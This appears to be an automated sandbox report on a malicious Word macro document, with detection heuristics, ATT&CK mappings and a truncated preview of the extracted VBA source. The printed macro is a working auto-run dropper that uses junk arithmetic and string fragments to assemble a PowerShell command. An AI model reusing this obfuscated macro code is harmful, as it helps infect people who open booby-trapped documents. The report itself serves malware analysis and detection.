Verdict: MALICIOUS
Risk Score: 222
Malware Insights

MITRE ATT&CK:
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is configured to execute code via the Shell() function, indicating an attempt to download and run a secondary payload. The ClamAV detection 'Doc.Malware.Valyria-6874676-0' further supports its malicious nature.
Heuristics (6)
- ClamAV: Doc.Malware.Valyria-6874676-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Valyria-6874676-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas (SHA-256: df8dd97407b1aa12fffc1cca66d32544b79f2103c313f61d54648c874a86f792) | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 48839 bytes |
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "uqEwBMSRDvsXwm"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
vmPJl = (95024 - 3285 / 54662 * jjupM + (9513 + Niwov + 14828 / SEZcV * 38979 / TjSpM))
mTjOBp = (57689 - 61775 / 7946 * IYPfik + (7143 + ROWbX + 14674 / drsVGL * 17589 / TChodq))
vNzbA = (540 - 2091 / 24244 * aJaij + (59224 + fwpBYs + 84040 / NiYdEE * 93246 / iIcTf))
wUhwfj = (75402 - 6240 / 47118 * wNjGL + (91547 + OXzlKz + 70189 / pwcwva * 60593 / iXGqL))
kKrGsrGiiO = Application.Run("ZNHZmYwIdwBR", "" + ImOQYjiY + UwTczEKnawELU + QspEcS + kNfuEN + hjETzf + EmKphipPmJc + MhkCWbNQ + iXsYOdqiG + cANdQ + JjijXrC + osNYcDUs + jjmlGVUXVdU + OACrcM + bSppSpUdc + zNKOsOpzE + RzOmAM + SXnzpmH + pzhNvzM + MOSuwoXzzpjK)
vTrACb = (13806 - 49732 / 88508 * zZvumF + (17004 + zVMDQ + 25471 / Nshcv * 91340 / zdmsV))
wSnEjF = (10672 - 32454 / 89907 * twMQXD + (81214 + lKiLNf + 60927 / jsNiNt * 67173 / juIud))
End Sub
Attribute VB_Name = "IcTTiNTnZwp"
Function QspEcS()
On Error Resume Next
wriAa = 10245 * jmGzjf - 73397 + BTzPuW + 72313 - GzBRnS * 75382 + PzOrvl + 80257 * hNQGi
laCzfv = 11686 * CKwcAY - 77482 + QzYjjQ + 89495 - PdsihG * 58860 + MUQqk + 37709 * nJHLj
RZdkj = 75146 / WHcYb - baiOsj + CXkkV + (aXWJh * nWiiz - SdZTl + lmnonU / (hntztp / OQMmAw / 90302 / 41965))
SZwDGkOtvk = "" + jtUzHJKvUjOkB + KwjmQfHzIw + "pOw" + acFNrFnJoMGW + ZwKWjGk + "ERs" + OAKtKbvMDQYkTP + iNujwqJlOF + "hEl" + mNkBofqNjMdht + FdRGhrz + "l " + pBwYrZfEPHapf + nYFqRjMqznDHwz + " " + mHsLmhRVHhZRlZ + FWSImJnIdLA + Chr(34) + " . " + RiElLnhnMIFHj + KuEXZdCajWKd + "((g" + hbjjipwUjamf + NNBCZCwjGcLKPI + "v " + BJNDihZaB + pNilurINTVHD + "'*Md" + wUEUXZpzRZcR + foaAjPIVc + "R*'"
TTXMT = 32055 / XioKO + Yzmis / 80667 / 7629 * IDZBC * 99422 * 48318 / (nFsKQ * bkKjL)
THvEu = 86915 / vSjNU + dTwsw / 10002 / 17738 * IthfuH * 44817 * 4530 / (crMDES * sXjWWQ)
wrISXqjrvH = "" + OtEhTXtndai + QzLRQAwu + ")." + DwMYCYJiA + ofwUfBfAbRf + "NAME" + KmzSuCW + bAkHzrOUwdu + "[3" + SOwlwSuGAXc + PZrjzitID + ",1" + YBnlHVBaUiTk + DDpZacIw + "1,2" + pcMfPoTPSMM + JziWBqfwoVZ + "]-" + EjdTbbPLviI + fOESJzGX + "jOI"
VviSUY = 24858 / DSFZG + vqmiu / 21474 / 97283 * LaElPO * 46329 * 78116 / (wAPVP * ZCnPNz)
vGGGG = 60222 / Hnlok + lwkkhU / 26034 / 38976 * ArKQs * 42557 * 23869 / (nCYJhN * VJfuX)
MiNmfPwwD = "" + GFaTtQdK + jDOiIwBOzJZq + "N'')" + DMcGvkmGXvi + EvCTpilfiLTfQ + " ("
NKzAv = 70697 / CrBrXz + XkpJNb / 21494 / 82555 * itcWi * 968 * 20412 / (Lmfrj * QLTvrQ)
nBCsOh = 12232 / RJEzD + tuidu / 68091 / 54534 * dDFqzQ * 13248 * 7333 / (tIiWzS * vuYIk)
GuiQKu = 29533 / nWOAzd + SEzKwT / 94384 / 80872 * MJBUBJ * 53182 * 59911 / (BAcNO * tpPPw)
rbOJXvh = "" + TUXKjzWPNWp + TODBhhf + " \" + Chr(34) + wrmYzufUan + JBKqbUoWR + " $(" + dKsEspjAzqwYf + CcktwBUn + "SeT" + sLFMqOCbA + EpmirnBcK + "-itE"
SQSMmY = (46203 * IWirAi + 56544 * IbwzfO + 93210 + mzOFOT) * zkNsp + ibdDKA * 83987 - 42132
ANztAN = (59379 * EUUaoK + 35601 * oLjGml + 76898 + dzTuVN) * bnKOr + aKmGO * 77869 - 41063
MTzXwjuXRs = "" + TkjLjmsAOZGP + kdqPtmivaMOAwA + "M '" + STZMzJmBYovKAS + JrVlwGjS + "VAri" + KXzjqrcQHn + ubrorErTuIDDq + "ab" + nzMmGDbwPEr + ijLUUVz + "le:o" + JOcbpdBTuplMoR + jkScckz + "Fs' " + kLziiUHltpzKf + zvKBNqtRQTllfQ + " '" + PWnFREkLVd + cwqDVTfjZzszqt + "')\" + Chr(34) + zjcUbQhos + sKwjjPwpTdhP + Chr(43) + "[sT" + kzSdqPYYWOmB + MOCLNmnWbR + "ri" + sDMlPTRjqQPK + IUokuiIddEaWCY + "nG][" + YAUIWULkz + XdvwrITdSiqW + "Cha"
CwcVu = (59551 * uwGFi + 89841 * wbXWn + 30682 + fwfur) * tjDdOU + CiBDLV * 86310 - 66348
OaHLs = (31912 * lcrPpt + 43769 * IElbzl + 82 + FiOjvi) * idujIu + YGCrl * 2905 - 8365
PwpKd = (10646 * cnOsBc + 58313 * zGvJlv + 19578 + uEfiY) * AwdWj + mFUCci * 33950 - 92196
fjIFOYou = "" + ELPDBLuIdmWzwa + MNvdqNBCPZTLS + "R[" + IWmqjWpfsiFq + iEdIcjUbwCq + "]](
... (truncated)